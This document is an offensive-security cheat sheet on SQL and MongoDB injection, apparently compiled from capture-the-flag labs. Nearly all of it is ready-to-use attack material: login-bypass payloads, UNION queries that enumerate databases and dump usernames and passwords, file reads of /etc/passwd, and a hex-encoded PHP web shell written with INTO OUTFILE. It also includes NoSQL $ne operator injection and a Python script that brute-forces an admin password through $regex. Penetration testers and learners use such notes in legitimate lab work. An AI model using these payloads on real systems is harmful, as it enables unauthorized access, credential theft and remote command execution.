# SQL Injection

# Basic - Login Bypass

' OR 1=1;--
' or 1=1 LIMIT 1 --
' or 1=1 --
' or 1=1 -- -
' or '1'='1
' or 1=1 --+ 
' or 1#

admin' OR 1=1;--
admin' or 1=1;# 
admin' or 1=1 LIMIT 1 -- -
admin' or 1=1 LIMIT 1;# 
admin' or 1=1 LIMIT 0,1;#

# User Registration

Usually found in the username field.

user'-- -                        # SQL error: the quote breaks the query, so the field is injectable
user')-- -                       # No error: the original query wraps the value in parentheses
user') union select 1,2-- -      # Start enumerating columns (add a column until the error disappears)

# Manual SQL Injections

# check for sqli vulnerability: a database error (or a changed page) from a lone quote means the input reaches the query unescaped
?id=1'

# find the number of columns: raise N in ORDER BY N until the query errors; the last N that works is the column count
?id=1 order by 9 -- -

# Find which columns are reflected in the page; a number that shows up marks a column you can replace with data
?id=1 union select 1,2,3,4,5,6,7,8,9 -- -

# Get the database name
?id=1 union select 1,2,3,4,database(),6,7,8,9 -- -

# Get all database names
?id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,group_concat(schema_name),NULL,NULL,NULL from information_schema.schemata -- -

# Get the tables from a specific database (here 'sqli_one'; use database() for the current one)
?id=1 union select 1,2,3,4,group_concat(table_name),6,7,8,9 FROM information_schema.tables WHERE table_schema = 'sqli_one' -- -

# Get username of the sql-user
?id=1 union select 1,2,3,4,user(),6,7,8,9 -- -

# Get version
?id=1 union select 1,2,3,4,version(),6,7,8,9 -- -

# Get all tables
?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables -- -

# Get all columns from a specific table. Add `and table_schema = database()` to the WHERE clause, otherwise same-named tables in other databases are mixed in
?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = 'users' -- -

# Get content from the users-table, from the columns name and password. (0x3a is ':' and only serves as a delimiter between name and password)
?id=1 union select 1,2,3,4,concat(name,0x3a,password),6,7,8,9 FROM users -- -

# Read file (needs the FILE privilege and a path allowed by secure_file_priv; otherwise load_file() silently returns NULL)
?id=1 union select 1,2,3,4, load_file('/etc/passwd') ,6,7,8,9 -- -
?id=1 union select 1,2,3,4, load_file('/var/www/login.php') ,6,7,8,9 -- -

# create a file and call it to check if really created. Needs the FILE privilege, a directory writable by the mysqld user and allowed by secure_file_priv; INTO OUTFILE never overwrites an existing file. Use a non-existent id (e.g. ?id=-1) so only the injected row is written, not the original row too
?id=-1 union select 1,2,3,4,'this is a test message' ,6,7,8,9 into outfile '/var/www/test' -- -
?id=1 union select 1,2,3,4, load_file('/var/www/test') ,6,7,8,9 -- -

# create a file to get a shell. The PHP contains quotes, so pass it as a hex literal (MySQL treats 0x... as a string):
#   <?php system($_GET['cmd']); ?>  ->  0x3c3f7068702073797374656d28245f4745545b27636d64275d293b203f3e
?id=-1 union select null,null,null,null,0x3c3f7068702073797374656d28245f4745545b27636d64275d293b203f3e,6,7,8,9 into outfile '/var/www/shell.php' -- -
?id=1 union select null,null,null,null, load_file('/var/www/shell.php') ,6,7,8,9 -- -

# then go to browser and see if you can execute commands
http://<targetip>/shell.php?cmd=id

# Then use Pentest Monkey Reverse Shells to call your shell

# Load/Read File

SQL injection login post:

username=admin' union select 1, LOAD_FILE("/etc/passwd"),2,3-- -&password=admin

Example: IppSec's Writer walkthrough.

# MongoDB

# Operator injection (type confusion: the password value becomes an object instead of a string)

# Content-Type: application/x-www-form-urlencoded — works when the body parser expands bracket notation into nested objects (e.g. Express urlencoded with extended parsing)
user=admin&password[$ne]=admin

JSON format

// Change the POST Content-Type to application/json
{
	"user":"admin",
	"password":{
		"$ne":"admin"
	}
}

Example: NodeBlog

Brute-force the password character by character with the `$regex` operator — Python script

import requests
import json
import string
import sys

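# Target login endpoint; override via the `url` argument when reusing the script.
TARGET_URL = "http://10.129.96.160/login"


def login(pw, url=TARGET_URL, proxies=None):
	"""Oracle for the regex brute-force: True if the regex `pw` matches admin's password.

	Sends {"user": "admin", "password": {"$regex": pw}} as JSON. The server is
	assumed to answer a failed match with the text "Invalid Password"; any other
	response counts as a match, so an error page would look like a hit —
	TODO confirm the failure string against the target.

	pw:      regex pattern to test, e.g. "^ab" or "^abc$".
	url:     login endpoint (defaults to TARGET_URL).
	proxies: optional requests proxy map, e.g. {"http": "http://127.0.0.1:8080"}
	         to route through Burp.
	"""
	# Build the operator object directly instead of formatting a JSON string,
	# so quotes or backslashes in `pw` cannot break the payload.
	data = {"user": "admin", "password": {"$regex": pw}}
	r = requests.post(url, json=data, proxies=proxies, timeout=10)
	return "Invalid Password" not in r.text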

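# Characters tried at each position. Letters and digits are regex-safe; anything
# else would have to be escaped before being placed in the pattern.
CHARSET = string.ascii_letters + string.digits


def brute_force(oracle, charset=CHARSET):
	"""Recover a secret one character at a time through a regex oracle.

	oracle(pattern) must return True when `pattern` matches the secret
	(see login()). Patterns are anchored: "^<known><c>" tests the next
	character, "^<known>$" tests whether the whole secret has been found.
	Progress is echoed to stdout on a single line.

	Returns the recovered secret (without the anchors).
	Raises RuntimeError when no character of `charset` extends the known
	prefix, instead of looping forever.
	"""
	found = ""
	while True:
		# Check completion first so an empty secret is handled as well.
		if oracle(f"^{found}$"):
			sys.stdout.write(f"\r{found}\r\n")
			sys.stdout.flush()
			return found
		for ch in charset:
			sys.stdout.write(f"\r{found}{ch}")
			# Test the candidate character, not just the already-known prefix
			# (the original loop queried the prefix alone, which always matched).
			if oracle(f"^{found}{ch}"):
				found += ch
				break
		else:
			raise RuntimeError(f"no character in charset extends {found!r}; widen CHARSET")


if __name__ == "__main__":
	brute_force(login)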